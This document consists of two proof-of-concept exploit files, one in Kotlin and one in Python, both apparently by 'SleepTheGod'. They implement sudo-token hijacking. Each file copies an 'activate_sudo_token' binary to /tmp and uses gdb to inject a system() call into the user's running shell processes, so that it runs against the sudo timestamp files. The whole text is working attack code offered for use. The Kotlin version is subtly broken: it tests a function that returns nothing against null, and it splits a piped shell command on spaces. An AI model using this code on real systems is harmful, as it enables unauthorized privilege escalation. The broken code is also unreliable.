File: poc.kt
import java.io.File
import java.io.IOException
import java.nio.file.Files
import java.nio.file.Paths

fun runCommand(command: String) {
    try {
        val process = ProcessBuilder(*command.split(" ").toTypedArray())
            .redirectErrorStream(true)
            .start()
        process.waitFor()
    } catch (e: IOException) {
        println("Error running command: $command")
        e.printStackTrace()
    }
}

fun injectSudoToken(pid: Int) {
    val command = """
        echo 'call system("echo | sudo -S /tmp/activate_sudo_token /var/lib/sudo/ts/* >/dev/null 2>&1")' |
        gdb -q -n -p $pid >/dev/null 2>&1
    """.trimIndent()

    runCommand(command)
}

fun main() {
    // Check if the script is being run as root
    if (System.getProperty("user.name") != "root") {
        println("This script must be run as root.")
        return
    }

    // Copy the sudo token activation script to /tmp and make it executable
    runCommand("cp activate_sudo_token /tmp/")
    runCommand("chmod +x /tmp/activate_sudo_token")

    // Retrieve the sudo timestamp directory
    val timestampDirCommand = "sudo --version | grep 'timestamp dir' | grep -o '/.*'"
    val timestampDir = runCommand(timestampDirCommand)
    if (timestampDir == null) {
        println("Could not retrieve timestamp directory.")
        return
    }

    // Iterate over processes owned by the current user
    val procDir = File("/proc")
    val userName = System.getProperty("user.name")

    procDir.listFiles()?.forEach { file ->
        if (file.isDirectory && file.name.matches(Regex("\\d+"))) {
            val pid = file.name.toInt()
            val commFile = File("/proc/$pid/comm")

            if (commFile.exists()) {
                val comm = commFile.readText().trim()
                if (comm in listOf("bash", "zsh", "sh", "csh", "ksh", "tcsh", "dash") && pid != ProcessHandle.current().pid()) {
                    println("Injecting process $pid -> $comm")
                    injectSudoToken(pid)
                }
            }
        }
    }
}

File: poc.py
import os
import subprocess
import psutil

# Made By SleepTheGod be sure to pip install psutil

def run_command(command):
    """Helper function to run shell commands."""
    subprocess.run(command, shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)

def inject_sudo_token(pid):
    """Injects the sudo token activation into the process using gdb."""
    try:
        command = f'echo \'call system("echo | sudo -S /tmp/activate_sudo_token /var/lib/sudo/ts/* >/dev/null 2>&1")\' | gdb -q -n -p {pid} >/dev/null 2>&1'
        run_command(command)
    except Exception as e:
        print(f"Error injecting process {pid}: {e}")

def main():
    # Ensure the script is being run with root privileges
    if os.geteuid() != 0:
        print("This script must be run as root.")
        return

    # Copy the sudo token activation script to /tmp and make it executable
    subprocess.run(['cp', 'activate_sudo_token', '/tmp/'])
    subprocess.run(['chmod', '+x', '/tmp/activate_sudo_token'])

    # Get the timestamp directory for sudo (if it exists)
    try:
        timestamp_dir = subprocess.check_output("sudo --version | grep 'timestamp dir' | grep -o '/.*'", shell=True).decode().strip()
    except subprocess.CalledProcessError:
        print("Could not determine timestamp directory.")
        return

    # Iterate over processes owned by the current user and inject the sudo token
    for proc in psutil.process_iter(['pid', 'username', 'name']):
        if proc.info['username'] == os.getenv('USER') and proc.info['name'] in ['bash', 'zsh', 'dash', 'sh', 'csh', 'ksh', 'tcsh']:
            if proc.info['pid'] != os.getpid():  # Exclude the current script process
                print(f"Injecting process {proc.info['pid']} -> {proc.info['name']}")
                inject_sudo_token(proc.info['pid'])

if __name__ == "__main__":
    main()
